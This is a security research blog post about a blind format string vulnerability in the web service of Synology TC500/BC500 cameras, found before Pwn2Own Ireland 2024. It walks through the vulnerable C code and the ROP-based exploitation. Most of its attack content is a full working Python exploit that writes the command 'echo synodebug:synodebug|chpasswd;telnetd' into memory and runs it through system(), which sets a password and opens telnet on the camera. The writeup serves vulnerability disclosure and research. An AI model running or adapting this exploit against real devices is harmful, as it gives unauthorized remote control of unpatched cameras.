Exploiting a Blind Format String Vulnerability in Modern Binaries: A Case Study from Pwn2Own Ireland 2024
- 30/10/2024 - inIn October 2024, during the Pwn2Own event in Cork, Ireland, hackers attempted to exploit various hardware devices such as printers, routers, smartphones, home automation systems, NAS devices, security cameras, and more. This blog post highlights a challenging vulnerability that was patched just before the competition. Although it was fixed in time, it deserved more attention than simply being discarded.
Introduction
Prior to Pwn2Own 2024, a prestigious hacking competition known for showcasing exploits targeting widely used software and devices, the Synology TC500 security camera running on an ARM 32-bit architecture was found to be vulnerable to a format string bug. This vulnerability was discovered in a WEB service, specifically in a function parsing HTTP requests, where improper string formatting led to the flaw.
Despite modern security measures such as Address Space Layout Randomization (ASLR), Position Independent Executables (PIE), Non-Executable memory (NX), and Full Relocation Read-Only (Full RelRO), the vulnerability remained exploitable under specific conditions.
The exploitation came with additional challenges: payloads were limited to 128 characters (with some reserved for the client IP address), and a range of characters (from 0x00
to 0x1F
) was disallowed. Additionally, without memory leaks or visibility into the format string output from the client side, the exploit had to be performed in a blind context.
The vulnerable code snippet is as follows:
void mg_vsnprintf(const struct mg_connection *conn, int *truncated, char *buf, size_t buflen, const char *fmt, va_list ap) {
int n;
int ok;
if ( buflen ) {
n = vsnprintf(buf, buflen, fmt, ap);
ok = (n & 0x80000000) == 0;
if ( n >= buflen ) {
ok = 0;
}
if ( ok ) {
if ( truncated ) {
*truncated = 0;
}
buf[n] = 0;
} else {
if ( truncated ) {
*truncated = 1;
}
mg_cry(conn, "mg_vsnprintf", "truncating vsnprintf buffer: [%.*s]", (int)((buflen > 200) ? 200 : (buflen - 1)), buf);
buf[n] = '\0';
}
} else if ( truncated ) {
*truncated = 1;
}
}
void mg_snprintf(const struct mg_connection *conn, int *truncated, char *buf, size_t buflen, const char *fmt, ...) {
va_list ap;
va_start(ap, fmt);
mg_vsnprintf(conn, truncated, buf, buflen, fmt, ap);
}
void print_debug_msg(pthread_t thread_id, const char *fmt) {
int i;
if ( workerthreadcount > 0 ) {
i = 0;
do {
if ( debug_table[i].tid == thread_id ) {
mg_snprintf(0, 0, debug_table[i].buf, 0x80u, fmt); // Uncontrolled format string.
debug_table[i].buf[strlen(fmt)] = 0;
}
++i;
} while ( i < workerthreadcount );
}
}
void parse_http_request(struct mg_request_info *conn) {
pthread_t tid;
char buf[0x80];
/* [...] */
tid = pthread_self();
/* [...] */
memset(buf, 0, sizeof(buf));
mg_snprintf(0, 0, buf, 0x80u, "%s%s", hostname, conn->request_uri); // Concat hostname to URI.
if ( debug_table ) {
print_debug_msg(tid, buf);
}
/* [...] */
}
The print_debug_msg
function allows an attacker to control the format string passed to vsnprintf
, leading to potential arbitrary memory writes. This blog post outlines our successful exploitation of this format string vulnerability, employing indirect memory manipulation techniques to bypass modern security measures and achieve arbitrary code execution.
Challenge Overview
Several technical challenges arose during the exploitation:
- Blind Exploitation: The absence of stack or base address leaks meant we had no visibility into the memory layout.
- ASLR and PIE: These mechanisms randomized the addresses of binaries and libraries, making it nearly impossible to rely on fixed addresses for gadgets or stack locations without compromising stability.
- Payload Limitations: The payload was restricted to 128 characters and could not contain null bytes or low ASCII characters (
[0x00-0x1F]
), further complicating the exploitation process.
Given these constraints, a classical stack-based format string exploitation approach was impractical.
Exploitation Strategy: Blind Format String Exploitation
The exploitation process required manipulating the format string to control memory writes. The key technique was to use a looping pointer to forge a controlled double stack pointer, allowing it to be adjusted in order to write to arbitrary locations on the stack.
1. Gaining Write Access to the Stack
The first step in our exploitation was to gain arbitrary write access to the stack. With no memory leaks, we had to work blindly. We found a looping pointer that could be modified to point to another area of the stack containing a valid stack pointer. By changing its least significant byte (LSB), we created a double pointer, allowing us to use the first pointer to modify the second, effectively pointing it to any location on the stack. This allowed us to write to a predictable stack location without needing to know its exact address.
2. Building the ROP Chain on the stack
Once we achieved arbitrary write access on the stack, we began constructing our ROP chain within unused space in the stack frame of the vulnerable function. This area is never touched, making it an ideal location for our exploit. Additionally, it was close enough to be accessed with a stack adjustment gadget, allowing us to execute our ROP chain.
Using the format string specifier %*X$c
, we could read a value at a specific stack offset (such as the return address) and store it in the internal "character counter". We then incrementally adjusted this value with the %Y$c
format specifier before writing it back to our unused stack space with %Z$n
. This technique allowed us to bypass both PIE and ASLR while building the ROP chain.
Careful selection of gadgets was crucial, especially those appearing after the return address, to simplify the increment process:
ropper -f rootfs/bin/webd --nocolor --quality 1 --all | awk '{addr = strtonum($1)} addr > 0x28a5c'
This approach allowed us to build the ROP chain step by step, as follows:
- We adjusted the last pointer of the stack pointer chain to point to the gadget location within the unused stack space using
%916$hhn
. - By reading the return address with
%*111$c
(the offset could vary depending on the system version) and modifying it with a specific offset, we temporarily stored the gadget address in the "char counter". - We then wrote the gadget address from the character counter into the unused stack space using one of two techniques, depending on the result of the addition:
- If the last 16 bits did not overflow after the addition, we used the
%924$hn
format specifier to overwrite the last 16 bits of the return address copy on the unused stack space. - If the addition caused the 16-bits value to overflow, we instead used
%924$n
to write the full gadget address directly in one shot. This was feasible due to the relatively low value of the code base address.
- If the last 16 bits did not overflow after the addition, we used the
Although the one-shot write could be used for any gadget, we aimed to minimize its use for performance reasons: the higher the ROP gadget address, the larger the memory footprint for writing it.
This process was repeated until the entire ROP chain was constructed.
3. Writing the Command Line
With the ROP chain established, we crafted the payload necessary to execute our final command. Our goal was to invoke a shell command via the system()
function.
Due to payload restrictions, we wrote each byte of the command string using multiple requests, applying the following process for every characters:
- We adjusted the last pointer of the stack pointer chain to point to the character location in our unused stack space.
- Using a basic format string, we incremented the char counter to the target byte value, then wrote it to the designated position in the unused stack space through our controlled stack pointer using
%924$hhn
.
For instance, we wrote the command sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd'
one byte at a time, meticulously controlling the memory writes through the format string. By the end of this process, the command was fully written in the unused stack space, ready for execution.
4. Finalizing the Exploit: Adjusting the Stack and Executing the ROP Chain
The concluding step involved adjusting the stack pointer to execute our prepared ROP chain. This was achieved by overwriting the return address with a gadget that modified the stack pointer, shifting it to a controlled position where the ROP chain awaited.
Once the return address was modified, the program would redirect execution into our ROP chain, eventually calling system()
with the command stored in memory.
Here's a final version of the exploit for the version 1.1.2-0416
:
#!/usr/bin/env python3
import argparse
import urllib
import socket
import struct
import time
def get_args():
def auto_int(x):
return int(x, 0)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-?", "--help", action="help", help="show this help message and exit")
parser.add_argument("-t", "--timeout", help="Timeout while receiving response", default=5, type=float)
parser.add_argument("-S", "--shost", help="Source host", type=str)
parser.add_argument("-P", "--dport", help="Remote port", default=80, type=int)
parser.add_argument("-H", "--dhost", help="Remote host", default="192.168.15.91", type=str)
args = parser.parse_args()
return args
class Exploit():
def __init__(self, shost, dhost, dport):
self.prefix_padding_size = 16
self.dhost = dhost
self.dport = dport
self.sock = self.connect()
if not self.sock:
exit(0)
if shost:
self.local_ip = shost
else:
self.local_ip = self.sock.getsockname()[0]
def disconnect(self):
self.sock.close()
self.sock = None
def connect(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(None)
sock.connect((self.dhost, self.dport))
return sock
except Exception as e:
return None
def send_payload(self, payload):
try:
if not self.sock:
self.sock = self.connect()
if not self.sock:
exit(0)
self.sock.send(payload)
resp = self.sock.recv(4096)
except Exception as e:
pass
self.disconnect()
def prepare_payload(self, raw_payload, payload_char=0x42):
"""
Append padding to the payload and check for bad chars.
"""
assert not (self.local_ip is None)
assert not (any(c in raw_payload for c in range(0, 0x21)))
url = self.local_ip.encode().ljust(self.prefix_padding_size, b"B")[len(self.local_ip):]
url += raw_payload
payload = b"AAAA " # HTTP verb
payload += url.ljust(115, bytes([payload_char])) # make sure we trigger the truncation
payload += b" CCCC\r\n\r\n" # HTTP version
return payload
def stage_0(self):
"""
Craft a double stack pointer from a looping one.
The looping pointer is at offset 916, we make it point to the offset 924.
The pointer at offset 924 is pointing to the offset 153.
"""
print("[+] Crafting a double stack pointer...")
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += f"%{0xe0 - (len(raw_payload) + self.prefix_padding_size)}c".encode()
raw_payload += b"%916$hhn" # overwrite the LSB of the looping pointer.
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def point_to_fake_stack(self, stack_offset, shift=0):
"""
Make our controlled stack pointer at offset 924 pointing to our fake stack at a given offset.
"""
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += f"%{0x50 + ((stack_offset*4) + shift) - (len(raw_payload) + self.prefix_padding_size)}c".encode()
raw_payload += b"%916$hhn"
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def point_to_ret_addr(self):
"""
Make our controlled stack pointer at offset 924 pointing to our return address (offset 111).
"""
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += f"%{0x12c - (len(raw_payload) + self.prefix_padding_size)}c".encode()
raw_payload += b"%916$hhn"
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def copy_ret_addr_to_ptr(self):
"""
Copy the return address to the controlled stack pointer at offset 924.
"""
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += b"%*111$c"
raw_payload += b"%924$n"
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def write_webd_gagdet_to_fake_stack(self, gadget_offset, stack_offset):
"""
Write WEBD gadget to our fake stack at a given offset.
"""
origin_ret_addr = 0x28a5c
assert not (gadget_offset < origin_ret_addr & ((1<<16)-1))
self.point_to_fake_stack(stack_offset)
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += b"%*111$c" # we use the return address as a reference to our gadget.
if gadget_offset - (origin_ret_addr + (len(raw_payload) + self.prefix_padding_size)) > 0: # check if we can just increment the return address.
offset = gadget_offset - (origin_ret_addr + (len(raw_payload) + self.prefix_padding_size))
str_offset = str(offset+len("%999999")).ljust(len("999999") - 2, "c")
raw_payload += f"%{str_offset}c".encode()
raw_payload += b"%924$n"
else: # or if we need to overwrite the last two bytes of the return address.
self.copy_ret_addr_to_ptr()
offset = (gadget_offset & ((1<<16)-1) | 1 << 16) - (origin_ret_addr & ((1<<16)-1)) - (len(raw_payload) + self.prefix_padding_size)
str_offset = str(offset+len("%999999")).ljust(len("999999") - 2, "c")
raw_payload += f"%{str_offset}c".encode()
raw_payload += b"%924$hn"
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def write_byte_to_fake_stack(self, value, stack_offset, value_offset):
"""
Overwrite one byte value of our fake stack at a given offset and index.
"""
origin_ret_addr = 0x28a5c
assert not (value >> 31 == 1) # can't write signed value in one shot.
self.point_to_fake_stack(stack_offset, value_offset)
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
offset = ((1<<8) | value) - (len(raw_payload) + self.prefix_padding_size)
raw_payload += f"%{str(offset)}c".encode()
raw_payload += b"%924$hhn"
payload = self.prepare_payload(raw_payload, payload_char=value)
self.send_payload(payload)
def stage_1(self):
"""
Prepare our fake stack.
+------ fake stack offset
| +-- format string offset
V V
0000: |00│120│ add_sp_20h_pop5-fmt_offset // r4: prepare the return address value before overwriting saved pc.
0004: |01│121│ junk // r5
0008: |02│122│ junk // r6
000c: |03│123│ junk // r7
0010: |04│124│ junk // r8
0014: |05│125│ pop_r3 // pc: just to control the next blx r3.
0018: |06│126│ pop_r4_r5 // r3
001c: |07│127│ add_r1_sp_18h_blx_r3 // pc: r1 points to the offset 0x38
0020: |08│128│ junk // r4
0024: |09│129│ junk // r5
0028: |10│130│ pop_r3 // pc
002c: |11│131│ bl_system // r3
0030: |12│132│ mov_r0_r1_blx_r3 // pc: make r0 pointing to our payload
0034: |13│133│ junk
0038: |14│134│ "sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd'"
"""
print("[+] Building a fake stack...")
add_sp_20h_pop5 = 0x000294bc # add sp, sp, #0x20; pop {r4, r5, r6, r7, r8, pc};
pop_r3 = 0x000a8824 # pop {r3, pc}
add_r1_sp_18h_blx_r3 = 0x00042bd0 # add r1, sp, #0x18; add r0, r4, #8; blx r3;
bl_system = 0x00025ddc # bl system
mov_r0_r1_blx_r3 = 0x0003fd5c # mov r0, r1; blx r3;
pop_r4_r5 = 0x0003f5dc # pop {r4, r5, pc};
self.write_webd_gagdet_to_fake_stack(gadget_offset=add_sp_20h_pop5-24, stack_offset=0)
self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r3, stack_offset=5)
self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r4_r5, stack_offset=6)
self.write_webd_gagdet_to_fake_stack(gadget_offset=add_r1_sp_18h_blx_r3, stack_offset=7)
self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r3, stack_offset=10)
self.write_webd_gagdet_to_fake_stack(gadget_offset=bl_system, stack_offset=11)
self.write_webd_gagdet_to_fake_stack(gadget_offset=mov_r0_r1_blx_r3, stack_offset=12)
cmd = b"sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd'"
for i, char in enumerate(cmd):
stack_offset=(14+(i//4)) # 14 is the offset of our command string inside our fake stack.
self.write_byte_to_fake_stack(value=char, stack_offset=stack_offset, value_offset=i%4)
def stage_2(self):
"""
Overwrite the return address with the value stored at the offset 0 of our fake stack (offset 120).
"""
print("[+] Overwriting PC...")
self.point_to_ret_addr()
raw_payload = b""
raw_payload += struct.pack("<L", 0x41414141)
raw_payload += struct.pack("<L", 0x42424242)
raw_payload += b"%*120$c" # we use our fake stack value.
raw_payload += b"%924$n"
payload = self.prepare_payload(raw_payload)
self.send_payload(payload)
def main(args):
exploit = Exploit(args.shost, args.dhost, args.dport)
exploit.stage_0()
exploit.stage_1()
exploit.stage_2()
print("[+] Woot!")
if __name__ == "__main__":
args = get_args()
main(args)
Conclusion
This exploit illustrates how format string vulnerabilities, when paired with specific format string specifiers, can bypass modern defenses such as ASLR and PIE. By utilizing a looping pointer to control writes to the stack, we successfully built a functional ROP chain without relying on direct memory leaks or brute force methods.
This vulnerability impacted Synology TC500 and BC500 cameras from version 1.1.1-0383
and was patched in version 1.1.3-0442
(see changelog) before Pwn2Own, meaning the exploit could not be executed during the competition.